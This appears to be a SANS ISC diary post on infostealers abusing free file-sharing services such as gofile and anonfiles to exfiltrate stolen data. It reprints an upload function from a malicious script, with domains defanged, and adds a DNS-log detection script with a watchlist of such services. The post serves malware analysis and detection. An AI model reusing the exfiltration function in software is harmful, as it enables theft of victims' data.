Online Services Again Abused to Exfiltrate Data

If attackers can abuse free online services, they will do so for sure! Why spend time deploying a C2 infrastructure when there are plenty of ways to use “official” services? Not only do they cost no money, but the traffic can also be hidden in normal traffic, making it more difficult to detect. A very popular one was anonfiles[.]com. It was so abused that it closed in 2023 [1]. A funny fact is that I still see a lot of malicious scripts that refer to this domain. Of course, alternatives popped up here and there, like anonfile[.]la [2].

I spotted some malicious scripts that abuse gofile[.]io[3], mainly infostealers that exfiltrate collected data through this website. The usage is pretty easy: you request an available server and you post your data:


def UploadToExternalService(self, path, filename=None) -> str | None:
    if os.path.isfile(path):
        Logger.info('Uploading %s to gofile' % (filename or 'file'))
    with open(path, 'rb') as file:
        fileBytes = file.read()
    if filename is None:
        filename = os.path.basename(path)
    http = PoolManager(cert_reqs='CERT_NONE')
    try:
        server = json.loads(http.request('GET', 'https://api[.]gofile[.]io/getServer').data.decode(errors='ignore'))['data']['server']
        if server:
            url = json.loads(http.request('POST', 'https://{}[.]gofile[.]io/uploadFile'.format(server), fields={'file': (filename,     
                             fileBytes)}).data.decode(errors='ignore'))['data']['downloadPage']
            if url:
                return url
    except Exception:
        try:
            Logger.error('Failed to upload to gofile, trying to upload to anonfiles')
            url = json.loads(http.request('POST', 'https://api[.]anonfiles[.]com/upload', fields={'file': (filename, 
                             fileBytes)}).data.decode(errors='ignore'))['data']['file']['url']['short']
            return url
        except Exception:
            Logger.error('Failed to upload to anonfiles')
            return None

Note that if the upload to gofile[.]io fails, they fall back to anonfiles[.]com!? Just why? The service is down…

There are many alternatives to these services. Here is a quick list:

  • transfer[.]sh
  • www[.]file[.]io

These services are usually not used in corporate environments, so it could be interesting to track hosts that try to resolve these domains!
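
One way to do the tracking suggested above, as an added example that is not part of the original diary: the log format, sample lines and function names are assumptions constructed for illustration. It matches on DNS label boundaries, so look-alike names such as profile.io are not flagged.

```python
from collections import defaultdict

# Domains named in this diary, written un-defanged so they match log entries.
WATCHLIST = {"gofile.io", "anonfiles.com", "anonfile.la", "transfer.sh", "file.io"}

# Constructed sample in an assumed format: "<timestamp> <client-ip> <qtype> <qname>"
SAMPLE_LOG = """\
2025-05-14T09:12:01Z 10.0.4.17 A api.gofile.io.
2025-05-14T09:12:02Z 10.0.4.17 A store3.gofile.io.
2025-05-14T09:12:09Z 10.0.4.17 A API.AnonFiles.com
2025-05-14T09:13:40Z 10.0.7.52 A www.file.io
2025-05-14T09:14:02Z 10.0.7.60 A profile.io
2025-05-14T09:14:30Z 10.0.7.61 A gofile.io.example.net
2025-05-14T09:15:00Z 10.0.7.62 AAAA notgofile.io
malformed line
"""

def watched_parent(qname):
    """Return the watchlist domain that qname equals or is a subdomain of, else None."""
    # Normalise: DNS names are case-insensitive and may carry a trailing root dot.
    labels = qname.rstrip(".").lower().split(".")
    # Test every suffix made of whole labels (never a partial-label match).
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in WATCHLIST:
            return candidate
    return None

def hosts_resolving_watchlist(log_text):
    """Map each client IP to the sorted list of watched domains it tried to resolve."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:  # skip lines that do not fit the assumed format
            continue
        _timestamp, client, _qtype, qname = fields
        domain = watched_parent(qname)
        if domain:
            hits[client].add(domain)
    return {client: sorted(domains) for client, domains in hits.items()}

if __name__ == "__main__":
    for client, domains in hosts_resolving_watchlist(SAMPLE_LOG).items():
        print(client, ", ".join(domains))
```

A host that queries both gofile and the defunct anonfiles domain within a short interval matches the fallback behaviour of the script shown earlier and deserves a closer look.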

[1] https://www.bleepingcomputer.com/news/security/file-sharing-site-anonfiles-shuts-down-due-to-overwhelming-abuse/

[2] https://www.anonfile.la/

[3] https://gofile.io/home

Xavier Mertens (@xme)

Xameco

Senior ISC Handler – Freelance Cyber Security Consultant
